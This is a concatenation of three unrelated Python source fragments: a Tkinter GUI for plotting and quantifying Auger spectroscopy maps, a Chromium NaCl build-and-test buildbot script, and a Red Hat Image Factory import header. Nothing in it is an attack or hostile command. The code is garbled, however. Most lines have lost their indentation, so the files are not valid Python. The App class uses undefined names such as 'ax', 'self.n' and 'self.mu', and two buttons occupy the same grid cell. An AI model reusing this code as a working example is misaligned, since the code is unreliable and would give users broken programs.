topframe.pack(side="top", fill="both", expand=True, padx=100, pady=100)
bottomframe.pack(side="bottom", fill="both", expand=True, padx=100, pady=100)
# Row for abort & run buttons
prow=tk.Frame(t)
tk.Button(prow, text='Abort', command=abort).pack(side=tk.LEFT)
mystr='Run '+kwargs.get('command','')
tk.Button(prow, text=mystr, command=runcmd).pack(side=tk.LEFT)
prow.pack(side="top", fill="both", expand=True, padx=100, pady=100)
class App(tk.Tk):
def __init__(self, parent=None):
tk.Tk.__init__(self, parent)
self.parent = parent
self.initialize()
def initialize(self):
self.title("Auger spectral plot")
        # load/instantiate Auger data set (assuming AESdataset unpacks into its
        # component logs; the original also created a second, unused instance)
        (self.Augerparamlog, self.spelist, self.Smdifpeakslog, self.Backfitlog,
            self.Integquantlog, self.AESquantparams) = AESdataset()
self.filename=self.spelist.iloc[0]['Filename'] # for autoloading of first spe file
self.Augerfile=pd.DataFrame()
self.filterstr = tk.StringVar()# filenums, name filters
tk.Label(self, text='Filename/number filter string').grid(row=0, column=0)
filentry=tk.Entry(self, textvariable=self.filterstr)
filentry.grid(row=0, column=1)
button = tk.Button(self, text="Quit", command=self.on_click)
button.grid(row=1, column=0)
button = tk.Button(self, text="Update plot", command=self.on_click)
button.grid(row=1, column=0)
fig = Figure(figsize=(6, 4), dpi=96)
ax1 = fig.add_subplot(211)
ax2 = fig.add_subplot(212, sharex=ax1)
x, y = self.data(self.n.get(), self.mu.get())
self.line1, = ax.plot(x, y)
self.graph = FigureCanvasTkAgg(fig, master=self)
canvas = self.graph.get_tk_widget()
canvas.grid(row=0, column=2)
def on_click(self):
self.quit()
    def filterfiles(self):
        ''' Grab filter string and apply it to the file list (placeholder) '''
        self.quit()
def on_change(self, value):
x, y = self.data(self.n.get(), self.mu.get())
self.line1.set_data(x, y) # update data
# set plot limit
# ax = self.graph.figure.axes[0]
# ax.set_xlim(min(x), max(x))
# ax.set_ylim(min(y), max(y))
# update graph
self.graph.draw()
def data(self, n, mu):
lst_y = []
for i in range(n):
lst_y.append(mu * random.random())
return range(n), lst_y
class GUIrois():
''' Parent is GUImain, manages QMfile displayed in GUIplotter
handles element and plot selections '''
def __init__(self,root,parent):
self.root = root
self.parent = parent
# instance of QMfile local to the roi/opts window
self.QMfile = None
self.tkelems=[] # bools list for elem display or quant
self.activequant=[] # for at % results (on extracted spectrum)
self.showelems=False # toggle for showing elemental lines on plot
self.currxy = None # x,y of extracted spectrum (or avg x,y if mult pixels)
self.togglederiv =False # plot quant
# Element selector checkboxes
self.left_frame = tk.Frame(self.root)
self.elems_frame = tk.Frame(self.left_frame, pady=10)
self.elems_frame.pack(side=tk.TOP,fill=tk.X,expand=1)
self.misc_frame = tk.Frame(self.left_frame, pady=10)
self.misc_frame.pack(side=tk.TOP,fill=tk.X,expand=1)
self.left_frame.pack(side=tk.LEFT)
# Frame for display of counts/quant results (at right)
self.quant_frame = tk.Frame(self.root, pady=10)
self.quant_frame.pack(side=tk.LEFT,fill=tk.X,expand=1)
# Element presets (top of misc frame)
rowframe=tk.Frame(self.misc_frame)
tk.Button(rowframe, text='Clear all', command=self.clearall).pack(side=tk.LEFT,fill=tk.X,expand=1)
tk.Button(rowframe, text='Select all', command=self.selectall).pack(side=tk.LEFT,fill=tk.X,expand=1)
rowframe.pack(fill=tk.X, expand=1)
# permanent buttons in misc_frame
rowframe=tk.Frame(self.misc_frame)
self.plottype=tk.StringVar()
tk.Radiobutton(rowframe, text='Shiftmap',value='Shiftmap',
variable=self.plottype).pack(side=tk.LEFT,fill=tk.X,expand=1)
tk.Radiobutton(rowframe, text='Amplmap',value='Amplmap',
variable=self.plottype).pack(side=tk.LEFT,fill=tk.X,expand=1)
tk.Radiobutton(rowframe, text='Integmap',value='Integmap',
variable=self.plottype).pack(side=tk.LEFT,fill=tk.X,expand=1)
tk.Radiobutton(rowframe, text='Countsmax',value='Countsmax',
variable=self.plottype).pack(side=tk.LEFT,fill=tk.X,expand=1)
tk.Radiobutton(rowframe, text='Elemmap',value='Elemmap',
variable=self.plottype).pack(side=tk.LEFT,fill=tk.X,expand=1)
tk.Button(rowframe, text='Plot', command=self.plot_maps).pack(side=tk.LEFT,fill=tk.X,expand=1)
rowframe.pack(fill=tk.X, expand=1)
self.toggle_button = tk.Button(
self.misc_frame,text="Toggle deriv/direct",command=self.toggle_deriv)
self.toggle_button.pack(side=tk.TOP,fill=tk.X,expand=1)
self.label_button = tk.Button(
self.misc_frame,text="Label elements",command=self.label_elems)
self.label_button.pack(side=tk.TOP,fill=tk.X,expand=1)
self.quant_button = tk.Button(
self.misc_frame,text="Update quant", command=self.do_quant)
self.quant_button.pack(side=tk.TOP,fill=tk.X,expand=1)
def create_QMfile(self, directory):
''' Creates QM file instance (called from menu)
automatically finds pixarray and works from there '''
print('Creating QM file.')
self.QMfile = AESquantmap(directory)
print("QMfile created with name ", self.QMfile.uniquename)
#print("QMfile", QMfile.uniquename, "created.")
for child in self.elems_frame.winfo_children():
child.destroy()
# no direct pass to GUIplotter (only 2D projections)
# loads quant elements into elems frame
self.display_elems()
def save_specimage(self):
''' Call AESquantmap save_specimage '''
if not self.QMfile:
return
self.QMfile.save_specimage()
    def toggle_deriv(self):
        ''' Toggle plotting from direct counts plot to s7d7 smooth-deriv '''
        self.togglederiv = not self.togglederiv
    def selectall(self):
        ''' Select all elements '''
        for tkbool in self.tkelems:
            tkbool.set(1)
    def clearall(self):
        ''' Clear selected elements '''
        for tkbool in self.tkelems:
            tkbool.set(0)
def load_maps(self):
        '''Menu/main launched '''
if self.QMfile is not None:
self.QMfile.load_maps()
def save_maps(self):
        '''Menu/main launched save of amplmaps, integmaps and shiftmaps '''
if self.QMfile is not None:
self.QMfile.save_maps()
def save_pixarray(self):
        '''Menu/main launched save of pixarray file (after linking with
        underlying data files) '''
if self.QMfile is not None:
self.QMfile.save_pixarray()
def save_ampl_images(self):
''' Save all extracted amplitude images as separate jpgs '''
if self.QMfile is not None:
self.QMfile.save_ampl_images()
def find_all_peaks(self):
''' Normal and best method for data extraction from specimage '''
if self.QMfile is not None:
self.QMfile.find_all_peaks()
def find_peaks(self):
''' For selected element(s), find peak center '''
# check if shiftmaps and amplitudes maps have already been saved
print('Running find_peaks in GUIroi')
for i, tkbool in enumerate(self.tkelems):
if tkbool.get():
self.QMfile.find_negpeaks(i)
print('Negpeak positions found for element', str(i))
def plot_multiplex(self):
''' Display current extracted spectrum in specviewer
shows only active elems '''
if self.QMfile.extracted is None: return
actelemdata=[]
vals=[] # for scatter points on spectral plots (active elems only)
for i, tkbool in enumerate(self.tkelems):
if tkbool.get():
actelemdata.append(self.QMfile.elemdata[i])
if self.togglederiv==False:
vals.append(self.QMfile.integparams[i])
else:
vals.append(self.QMfile.derivparams[i])
print("Plotting current extracted spectrum")
# pass current extracted spectrum or its deriv (1d np arr) and subset of active elem data info
if self.togglederiv==False: # plot direct
# pass integration center/ background fit for plotting
pkwargs={'type':'integ', 'vals':vals}
self.parent.specviewer.plot_multiplex(self.QMfile.extracted, self.QMfile.energy,
actelemdata, self.currxy, **pkwargs)
else: # plot deriv
# pass list of deriv params (xvals/yvals) for plot for each peak
pkwargs={'type':'deriv', 'vals':vals}
self.parent.specviewer.plot_multiplex(self.QMfile.extracts7d7, self.QMfile.energy,
actelemdata, self.currxy, **pkwargs)
def plot_maps(self):
''' Display 2D arrays of various types in mapviewer '''
activeelems=[]
plotmaps=[]
title=''
for i, tkbool in enumerate(self.tkelems):
if tkbool.get():
if self.plottype.get()=='Shiftmap':
# Use togglederiv to decide between deriv shift and integ shift
if self.QMfile.shiftmaps[i] is not None:
activeelems.append(self.QMfile.elements[i])
if self.togglederiv: # use deriv based shift
plotmaps.append(self.QMfile.shiftmaps[i][:,:,0])
title='Peak shift deriv'
else: # use direct peak shift
plotmaps.append(self.QMfile.shiftmaps[i][:,:,1])
title='Peak shift direct'
elif self.plottype.get()=='Amplmap':
if self.QMfile.amplmaps[i] is not None:
activeelems.append(self.QMfile.elements[i])
# 0th layer is amplitude
plotmaps.append(self.QMfile.amplmaps[i][:,:, 0])
title='Peak amplitude'
elif self.plottype.get()=='Integmap':
if self.QMfile.integmaps[i] is not None:
activeelems.append(self.QMfile.elements[i])
plotmaps.append(self.QMfile.integmaps[i][:,:,0])
title='Integcounts map'
                elif self.plottype.get()=='Countsmax':
                    if self.QMfile.integmaps[i] is not None:
                        activeelems.append(self.QMfile.elements[i])
                        # intensity before background subtraction at peak
                        plotmaps.append(self.QMfile.integmaps[i][:,:,2])
                        title='Counts max map'
# TODO finish element map creation
elif self.plottype.get()=='Elemmap':
if self.QMfile.amplmaps[i] is not None:
activeelems.append(self.QMfile.elements[i])
plotmaps.append(self.QMfile.elemmaps[i][:,:,0])
title='Element map'
print("Plotting ", self.plottype.get(), "for elements", ".".join(activeelems))
self.parent.mapviewer.replot_maps(activeelems, plotmaps, title)
def display_elems(self):
''' Display available quant elements in elems_frame (self.QMfile.elements only
contains elements that already have quant results (not other random peaks) '''
for child in self.elems_frame.winfo_children():
child.destroy()
        # Header label for the element selector frame
tk.Label(self.elems_frame, text='Available Elements').pack(side=tk.TOP,fill=tk.X,expand=1)
# tkelems bool variables for active/inactive for each element
self.tkelems=[]
for i, elem in enumerate(self.QMfile.elements):
self.tkelems.append(tk.BooleanVar())
self.tkelems[i].set(True)
        # Unfortunately tk/mpl combo requires use of pack (not grid)
        for i in range(0, len(self.QMfile.elements), 4):
            # associated checkbutton for each quant elem, up to four per row
            elemlistframe=tk.Frame(self.elems_frame)
            for j in range(i, min(i+4, len(self.QMfile.elements))):
                tk.Checkbutton(elemlistframe, variable=self.tkelems[j]).pack(side=tk.LEFT)
                tk.Label(elemlistframe, text=self.QMfile.elements[j]).pack(side=tk.LEFT)
            elemlistframe.pack(fill=tk.X, expand=1)
def label_quant(self):
''' Add a text label with current quant results to map viewer?
launched via button '''
#TODO adjust position of text quant label
elems=[i[0] for i in self.activequant]
vals=[f[1] for f in self.activequant]
vals=[int(i) if i>1 else "%0.1f" % i for i in vals]
self.parent.mapviewer.label_quant(elems, vals)
def label_elems(self):
''' Get currently selected elements from elems frame and associated energy
pass to plotter.label_elems
toggle style button
TODO not implemented ... is this even necessary for multiplex?
'''
if self.showelems:
self.showelems=False
else:
self.showelems=True
elemparams=[] # list of [elem, energyval]
# active (checked) tk elements will automatically be updated on check, right?
if self.showelems:
for i, tkbool in enumerate(self.tkelems):
if tkbool.get():
match=self.EDXdataset.EDXquantparams[self.EDXdataset.EDXquantparams['element']==self.QMfile.elements[i]]
ev=match.iloc[0]['energy']
elemparams.append([self.QMfile.elements[i],ev])
# now pass info to plotter (can be empty list)
self.parent.mapviewer.plot_elems(elemparams)
def do_quant(self):
''' Generate at % and error for subset of selected elements
then display quant ... linked to quant button
quant results for current extract spectrum in QMfile.quant (e.g.[elem,
ampl, shift, corrampl (kfactor adjusted)]
'''
# Clear current values
        self.activequant=[] # list w/ [elem symb, atperc, ampl]
        self.activequant2=[] # list w/ [elem, atperc, corrcnts, integcnts]
        '''Parameters saved in quant2: [0] elem [1] integcnts [2] energy
        [3] corrcnts [4] slope [5] intercept
        '''
# note erratperc (3rd in list) is actual error not % err
corrsum=0.0
corrsum2=0.0
for i, tkbool in enumerate(self.tkelems):
if tkbool.get():
# Add elem, val for at % and corrected amplitude (deriv-based)
if self.QMfile.quant[i][2]>0:
corrsum+=self.QMfile.quant[i][2]
self.activequant.append([self.QMfile.quant[i][0], 0.0,
self.QMfile.quant[i][2]])
else:
self.activequant.append([self.QMfile.quant[i][0], 0.0, 0.0])
# Add element, at% value, corrcnts and integcounts (integ-based)
# quant2 is elem, integcnts, corrcnts
if self.QMfile.quant2[i][2]>0:
corrsum2+=self.QMfile.quant2[i][2]
# elem, at. %, corrcnts, integcnts
self.activequant2.append([self.QMfile.quant2[i][0], 0.0,
self.QMfile.quant2[i][2], self.QMfile.quant2[i][1]])
                else:
                    self.activequant2.append([self.QMfile.quant2[i][0], 0.0, 0.0,
                        self.QMfile.quant2[i][1]])
        for i, vals in enumerate(self.activequant): # calc at %
            if corrsum > 0: # guard against divide-by-zero when nothing selected
                self.activequant[i][1]=100*self.activequant[i][2]/corrsum
            if corrsum2 > 0:
                self.activequant2[i][1]=100*self.activequant2[i][2]/corrsum2
self.display_quant()
def display_quant(self):
''' Display elemental quant (deriv and integ) for extracted spectrum
'''
# Clear any existing widgets in backreg frame
for child in self.quant_frame.winfo_children():
child.destroy()
# sort active quant elements by at percent
self.activequant.sort(key=lambda x: float(x[1]), reverse=True)
self.activequant2.sort(key=lambda x: float(x[1]), reverse=True)
# Write header row into backregs
rowframe=tk.Frame(self.quant_frame)
tk.Label(rowframe, text='Element').pack(side=tk.LEFT)
tk.Label(rowframe, text='At%').pack(side=tk.LEFT)
tk.Label(rowframe, text='Corrampl').pack(side=tk.LEFT)
#tk.Label(rowframe, text='Corrcnts').pack(side=tk.LEFT)
#tk.Label(rowframe, text='Err corrcnts').pack(side=tk.LEFT)
print('Element At% Corrampl')
rowframe.pack(fill=tk.X, expand=1)
# For values display len(quantelems)!=len(activeelems)
for i, [elem, atper, corrampl] in enumerate(self.activequant):
rowframe=tk.Frame(self.quant_frame)
tempstr=elem+' '
tk.Label(rowframe, text=tempstr).pack(side=tk.LEFT)
tk.Label(rowframe, text="%.1f" % atper).pack(side=tk.LEFT)
tk.Label(rowframe, text="%.0f" % corrampl).pack(side=tk.LEFT)
rowframe.pack(fill=tk.X, expand=1)
            print(elem+' '+"%.1f" % atper+' '+"%.0f" % corrampl)
# also print sorted quant to spyder console
print('Element At% Corrcnts Integcounts')
rowframe.pack(fill=tk.X, expand=1)
# For values display len(quantelems)!=len(activeelems)
for i, [elem, atper, corrcnts, integcnts] in enumerate(self.activequant2):
rowframe=tk.Frame(self.quant_frame)
tempstr=elem+' '
tk.Label(rowframe, text=tempstr).pack(side=tk.LEFT)
tk.Label(rowframe, text="%.1f" % atper).pack(side=tk.LEFT)
tk.Label(rowframe, text="%.0f" % corrcnts).pack(side=tk.LEFT)
tk.Label(rowframe, text="%.0f" % integcnts).pack(side=tk.LEFT)
rowframe.pack(fill=tk.X, expand=1)
print(elem+' '+"%.1f" % atper+' '+"%.0f" % corrcnts +' '+"%.0f" % integcnts)
def runcmd(self, ckwargs):
''' for menu launched commands with params '''
cmd=ckwargs.get('command')
if cmd=='uniform filter':
            self.QMfile.uniform_filter(size=ckwargs.get('filter size', 1))
def getcurrxy(self, indices):
''' Find X, Y values from passed selection (list of indices) '''
xys=[[i,j] for i in range(0,self.QMfile.dim[0]) for j in range(0,self.QMfile.dim[1])]
# get subset of x,y vals using index passed by lasso
selectxys=[xys[i] for i in indices]
if len(selectxys)==1:
self.currxy=selectxys[0] # X, Y map location of current extracted spectrum
print('Current xy is:', self.currxy)
else: # Get average X,Y of multiple pixel selection
print(len(selectxys),' pixels selected')
xvals=[i[0] for i in selectxys]
yvals=[i[1] for i in selectxys]
avgx=int(sum(xvals)/len(xvals))
avgy=int(sum(yvals)/len(yvals))
self.currxy=[avgx, avgy]
def extract_spectrum(self, selected):
''' Pass back lasso-selected path or single point, create/extract average
spectrum over this X-Y set '''
if self.QMfile is not None:
self.QMfile.extract_spectrum(selected)
self.getcurrxy(selected)
# Now plot multiplex (w/ active elements)
self.plot_multiplex()
def save_extracted(self):
''' Save currently extracted spectrum (calling method from open QMfile'''
if self.QMfile is not None:
self.QMfile.save_extracted()
def print_spectralregs(self):
''' Pop up to show spectral regions, evbreaks, etc. '''
if self.QMfile is not None:
print(self.QMfile.spectralregs)
class SpectraViewer():
''' Spectral plotter window for Auger survey or multiplex spectra '''
def __init__(self,root, parent):
self.root = root
self.parent = parent
self.figure = mpl.figure.Figure(figsize=PLOT_SIZE, dpi=100)
self.ax = self.figure.add_subplot(111)
self.figure.subplots_adjust(bottom=0.15,right=0.95,top=0.95)
self.canvas = FigureCanvasTkAgg(self.figure,self.root)
# just use standard toolbar
self.toolbar = NavigationToolbar2TkAgg(self.canvas,self.root)
self.toolbar.update()
self.plot_widget = self.canvas.get_tk_widget()
self.plot_widget.pack(side=tk.TOP, fill=tk.BOTH, expand=1)
self.toolbar.pack(side=tk.TOP, fill=tk.BOTH, expand=1)
self.canvas.show()
def plot_multiplex(self, extracted, energy, elemdata, currxy, **pkwargs):
''' Add variable number of subplots
called from GUIrois
extracted is 1D numpy array (same len as full multiplex) -- either deriv
or direct is passed
energy is full multiplex range ev vals for extracted spectrum (as list)
elemdata has peak stop/start indices for plots -- only active elements
currxy is X, Y of extracted spectrum (or avg x,y of lassoed ROI)
'''
# since # of subplots can change, need to destroy and recreate
try:
self.canvas.get_tk_widget().destroy() # destroy previous plot
self.toolbar.destroy()
except:
pass
plottype=pkwargs.get('type') # integ or deriv
vals=pkwargs.get('vals') # list with scatter points/backfits/etc.
        # elemdata entries hold the peak start/stop indices for each subplot
numcols=min(len(elemdata),2) # 1 or 2 columns
numrows=math.ceil(len(elemdata)/2)
self.figure = mpl.figure.Figure(figsize=PLOT_SIZE, dpi=100)
self.figure.subplots_adjust(bottom=0.15,right=0.95,top=0.95)
self.ax=[]
for i, elemd in enumerate(elemdata):
self.ax.append(self.figure.add_subplot(numrows,numcols,i+1))
[lowind, junk]=elemd[3]
[junk,highind]=elemd[4]
idealev=elemd[8] # ideal peak eV
symbol=elemd[0] # name of element/peak
self.ax[i].plot(energy[lowind:highind], extracted[lowind:highind])
self.ax[i].axvline(x=idealev)
energy=[int(i) for i in energy] # ensure ints
# for deriv vals is list of dfs w/ scatter points
if plottype=='deriv':
# derxvals and deryvals passed np arrays to add pospeak/negpeak
# as scatter plot
[elem, xvals, yvals, ampl]=vals[i]
self.ax[i].scatter(xvals, yvals, color='r')
# add elem and amplitude as text label
tempstr=symbol+' Ampl:'+ "%.2f" % ampl
self.ax[i].set_title(tempstr, fontsize=10)
elif plottype=='integ':
# elem, peak energy (integration center), integcnts, slope/ intercept of backfit
[elem, peakev, integcnts, slope, intercept]=vals[i]
# Scatter point at integration center
yvals= extracted[energy.index(peakev)]
self.ax[i].scatter(peakev, yvals, color='r')
# Plot background fit line
x=np.linspace(min(energy[lowind:highind]), max(energy[lowind:highind]), 100)
self.ax[i].plot(x, x*slope+intercept, color='r')
# add elem symbol and integcounts as subplot title
tempstr=symbol+' Integcnts:'+str(integcnts)
self.ax[i].set_title(tempstr, fontsize=10)
            # vertical lines at the ideal peak positions were added above via axvline
labelstr='X: '+str(currxy[0])+' Y: '+str(currxy[1])
self.ax[0].text(0.05,0.95, labelstr, transform=self.ax[0].transAxes, fontsize=12)
# recreate and pack
self.canvas = FigureCanvasTkAgg(self.figure, self.root)
self.toolbar = NavigationToolbar2TkAgg(self.canvas,self.root)
self.toolbar.update()
self.plot_widget = self.canvas.get_tk_widget()
self.plot_widget.pack(side=tk.TOP, fill=tk.BOTH, expand=1)
self.toolbar.pack(side=tk.TOP, fill=tk.BOTH, expand=1)
self.canvas.show()
def label_quant(self, elems, vals):
''' Add quant text label with active elems and at. % values '''
        if not elems: # nothing to label; original guarded on an undefined EDXfile attribute
            return
        # Build a composite text label from element symbols and at. % values
        fullstr=''
for i, (elem,val) in enumerate(zip(elems, vals)):
tempstr=r'$%s_{%.0f}$' %(elem, float(val))
fullstr+=tempstr
# transform=ax.transAxes uses coords from 0 to 1 (instead of true x and y vals)
self.ax.text(0.05,0.95, fullstr, fontsize=30, verticalalignment='top', transform=self.ax.transAxes)
self.canvas.show()
|
|
#!/usr/bin/python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Do all the steps required to build and test against nacl."""
import optparse
import os.path
import re
import shutil
import subprocess
import sys
# Copied from buildbot/buildbot_lib.py
def TryToCleanContents(path, file_name_filter=lambda fn: True):
"""
Remove the contents of a directory without touching the directory itself.
Ignores all failures.
"""
if os.path.exists(path):
for fn in os.listdir(path):
TryToCleanPath(os.path.join(path, fn), file_name_filter)
# Copied from buildbot/buildbot_lib.py
def TryToCleanPath(path, file_name_filter=lambda fn: True):
"""
Removes a file or directory.
Ignores all failures.
"""
if os.path.exists(path):
if file_name_filter(path):
print 'Trying to remove %s' % path
if os.path.isdir(path):
shutil.rmtree(path, ignore_errors=True)
else:
try:
os.remove(path)
except Exception:
pass
else:
print 'Skipping %s' % path
def FindChrome(src_dir, options):
if options.browser_path:
return options.browser_path
# List of places that chrome could live.
# In theory we should be more careful about what platform we're actually
# building for.
# As currently constructed, this will also hork people who have debug and
# release builds sitting side by side who build locally.
mode = options.mode
chrome_locations = [
'build/%s/chrome.exe' % mode,
'chrome/%s/chrome.exe' % mode,
# For Linux buildbots. scripts/slave/extract_build.py extracts builds
# to src/sconsbuild/ rather than src/out/.
'sconsbuild/%s/chrome' % mode,
# Windows Chromium ninja builder
'out/%s/chrome.exe' % mode,
'out/%s/chrome' % mode,
# Mac Chromium make builder
'out/%s/Chromium.app/Contents/MacOS/Chromium' % mode,
# Mac release make builder
'out/%s/Google Chrome.app/Contents/MacOS/Google Chrome' % mode,
# Mac Chromium xcode builder
'xcodebuild/%s/Chromium.app/Contents/MacOS/Chromium' % mode,
# Mac release xcode builder
'xcodebuild/%s/Google Chrome.app/Contents/MacOS/Google Chrome' % mode,
]
# Pick the one with the newest timestamp.
latest_mtime = 0
latest_path = None
for chrome in chrome_locations:
chrome_filename = os.path.join(src_dir, chrome)
if os.path.exists(chrome_filename):
mtime = os.path.getmtime(chrome_filename)
if mtime > latest_mtime:
latest_mtime = mtime
latest_path = chrome_filename
if latest_path is not None:
return latest_path
  raise Exception('Cannot find a chrome binary - specify one with '
                  '--browser_path?')
# TODO(ncbray): this is somewhat unsafe. We should fix the underlying problem.
def CleanTempDir():
# Only delete files and directories like:
# a) C:\temp\83C4.tmp
# b) /tmp/.org.chromium.Chromium.EQrEzl
file_name_re = re.compile(
r'[\\/]([0-9a-fA-F]+\.tmp|\.org\.chrom\w+\.Chrom\w+\..+)$')
file_name_filter = lambda fn: file_name_re.search(fn) is not None
path = os.environ.get('TMP', os.environ.get('TEMP', '/tmp'))
if len(path) >= 4 and os.path.isdir(path):
print
print "Cleaning out the temp directory."
print
TryToCleanContents(path, file_name_filter)
else:
print
print "Cannot find temp directory, not cleaning it."
print
def RunCommand(cmd, cwd, env):
sys.stdout.write('\nRunning %s\n\n' % ' '.join(cmd))
sys.stdout.flush()
retcode = subprocess.call(cmd, cwd=cwd, env=env)
if retcode != 0:
sys.stdout.write('\nFailed: %s\n\n' % ' '.join(cmd))
sys.exit(retcode)
def RunTests(name, cmd, nacl_dir, env):
sys.stdout.write('\n\nBuilding files needed for %s testing...\n\n' % name)
RunCommand(cmd + ['do_not_run_tests=1', '-j8'], nacl_dir, env)
sys.stdout.write('\n\nRunning %s tests...\n\n' % name)
RunCommand(cmd, nacl_dir, env)
def BuildAndTest(options):
# Refuse to run under cygwin.
if sys.platform == 'cygwin':
raise Exception('I do not work under cygwin, sorry.')
  # By default, use the version of Python that is being used to run this script.
python = sys.executable
if sys.platform == 'darwin':
    # Mac 10.5 bots tend to use a particularly old version of Python, look for
    # a newer version.
macpython27 = '/Library/Frameworks/Python.framework/Versions/2.7/bin/python'
if os.path.exists(macpython27):
python = macpython27
script_dir = os.path.dirname(os.path.abspath(__file__))
src_dir = os.path.dirname(os.path.dirname(os.path.dirname(script_dir)))
nacl_dir = os.path.join(src_dir, 'native_client')
# Decide platform specifics.
env = dict(os.environ)
if sys.platform in ['win32', 'cygwin']:
if options.bits == 64:
bits = 64
elif options.bits == 32:
bits = 32
elif '64' in os.environ.get('PROCESSOR_ARCHITECTURE', '') or \
'64' in os.environ.get('PROCESSOR_ARCHITEW6432', ''):
bits = 64
else:
bits = 32
msvs_path = ';'.join([
r'c:\Program Files\Microsoft Visual Studio 9.0\VC',
r'c:\Program Files (x86)\Microsoft Visual Studio 9.0\VC',
r'c:\Program Files\Microsoft Visual Studio 9.0\Common7\Tools',
r'c:\Program Files (x86)\Microsoft Visual Studio 9.0\Common7\Tools',
r'c:\Program Files\Microsoft Visual Studio 8\VC',
r'c:\Program Files (x86)\Microsoft Visual Studio 8\VC',
r'c:\Program Files\Microsoft Visual Studio 8\Common7\Tools',
r'c:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Tools',
])
env['PATH'] += ';' + msvs_path
scons = [python, 'scons.py']
elif sys.platform == 'darwin':
bits = 32
scons = [python, 'scons.py']
else:
p = subprocess.Popen(
'uname -m | '
'sed -e "s/i.86/ia32/;s/x86_64/x64/;s/amd64/x64/;s/arm.*/arm/"',
shell=True, stdout=subprocess.PIPE)
(p_stdout, _) = p.communicate()
assert p.returncode == 0
if options.bits == 64:
bits = 64
elif options.bits == 32:
bits = 32
elif p_stdout.find('64') >= 0:
bits = 64
else:
bits = 32
# xvfb-run has a 2-second overhead per invocation, so it is cheaper to wrap
# the entire build step rather than each test (browser_headless=1).
scons = ['xvfb-run', '--auto-servernum', python, 'scons.py']
chrome_filename = FindChrome(src_dir, options)
if options.jobs > 1:
scons.append('-j%d' % options.jobs)
scons.append('disable_tests=%s' % options.disable_tests)
if options.buildbot is not None:
scons.append('buildbot=%s' % (options.buildbot,))
# Clean the output of the previous build.
# Incremental builds can get wedged in weird ways, so we're trading speed
# for reliability.
shutil.rmtree(os.path.join(nacl_dir, 'scons-out'), True)
# check that the HOST (not target) is 64bit
# this is emulating what msvs_env.bat is doing
if '64' in os.environ.get('PROCESSOR_ARCHITECTURE', '') or \
'64' in os.environ.get('PROCESSOR_ARCHITEW6432', ''):
# 64bit HOST
env['VS90COMNTOOLS'] = ('c:\\Program Files (x86)\\'
'Microsoft Visual Studio 9.0\\Common7\\Tools\\')
env['VS80COMNTOOLS'] = ('c:\\Program Files (x86)\\'
'Microsoft Visual Studio 8.0\\Common7\\Tools\\')
else:
# 32bit HOST
env['VS90COMNTOOLS'] = ('c:\\Program Files\\Microsoft Visual Studio 9.0\\'
'Common7\\Tools\\')
env['VS80COMNTOOLS'] = ('c:\\Program Files\\Microsoft Visual Studio 8.0\\'
'Common7\\Tools\\')
# Run nacl/chrome integration tests.
# Note that we have to add nacl_irt_test to --mode in order to get
# inbrowser_test_runner to run.
# TODO(mseaborn): Change it so that inbrowser_test_runner is not a
# special case.
cmd = scons + ['--verbose', '-k', 'platform=x86-%d' % bits,
'--mode=opt-host,nacl,nacl_irt_test',
'chrome_browser_path=%s' % chrome_filename,
]
if not options.integration_bot and not options.morenacl_bot:
cmd.append('disable_flaky_tests=1')
cmd.append('chrome_browser_tests')
# Download the toolchain(s).
RunCommand([python,
os.path.join(nacl_dir, 'build', 'download_toolchains.py'),
'--no-arm-trusted', '--no-pnacl', 'TOOL_REVISIONS'],
nacl_dir, os.environ)
CleanTempDir()
if options.enable_newlib:
RunTests('nacl-newlib', cmd, nacl_dir, env)
if options.enable_glibc:
RunTests('nacl-glibc', cmd + ['--nacl_glibc'], nacl_dir, env)
def MakeCommandLineParser():
parser = optparse.OptionParser()
parser.add_option('-m', '--mode', dest='mode', default='Debug',
help='Debug/Release mode')
parser.add_option('-j', dest='jobs', default=1, type='int',
help='Number of parallel jobs')
parser.add_option('--enable_newlib', dest='enable_newlib', default=-1,
type='int', help='Run newlib tests?')
parser.add_option('--enable_glibc', dest='enable_glibc', default=-1,
type='int', help='Run glibc tests?')
# Deprecated, but passed to us by a script in the Chrome repo.
# Replaced by --enable_glibc=0
parser.add_option('--disable_glibc', dest='disable_glibc',
action='store_true', default=False,
help='Do not test using glibc.')
parser.add_option('--disable_tests', dest='disable_tests',
type='string', default='',
help='Comma-separated list of tests to omit')
builder_name = os.environ.get('BUILDBOT_BUILDERNAME', '')
is_integration_bot = 'nacl-chrome' in builder_name
parser.add_option('--integration_bot', dest='integration_bot',
type='int', default=int(is_integration_bot),
help='Is this an integration bot?')
is_morenacl_bot = (
'More NaCl' in builder_name or
'naclmore' in builder_name)
parser.add_option('--morenacl_bot', dest='morenacl_bot',
type='int', default=int(is_morenacl_bot),
help='Is this a morenacl bot?')
# Not used on the bots, but handy for running the script manually.
parser.add_option('--bits', dest='bits', action='store',
type='int', default=None,
help='32/64')
parser.add_option('--browser_path', dest='browser_path', action='store',
type='string', default=None,
help='Path to the chrome browser.')
parser.add_option('--buildbot', dest='buildbot', action='store',
type='string', default=None,
help='Value passed to scons as buildbot= option.')
return parser
def Main():
parser = MakeCommandLineParser()
options, args = parser.parse_args()
if options.integration_bot and options.morenacl_bot:
parser.error('ERROR: cannot be both an integration bot and a morenacl bot')
# Set defaults for enabling newlib.
if options.enable_newlib == -1:
options.enable_newlib = 1
# Set defaults for enabling glibc.
if options.enable_glibc == -1:
if options.integration_bot or options.morenacl_bot:
options.enable_glibc = 1
else:
options.enable_glibc = 0
if args:
parser.error('ERROR: invalid argument')
BuildAndTest(options)
if __name__ == '__main__':
Main()
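
# Typical (hypothetical) local invocation; flag names match the parser above
# and the script filename is whatever this file is saved as:
#   python this_script.py --mode=Release -j 4 --bits=64 \
#       --browser_path=/path/to/chrome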
|
|
#
# Copyright 2011 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import zope.interface
import oz.GuestFactory
import oz.TDL
import oz.ozutil
import subprocess
import libxml2
import traceback
import ConfigParser
import base64
from os.path import isfile
from time import *
from tempfile import NamedTemporaryFile
from imgfac.ApplicationConfiguration import ApplicationConfiguration
from imgfac.ImageFactoryException import ImageFactoryException
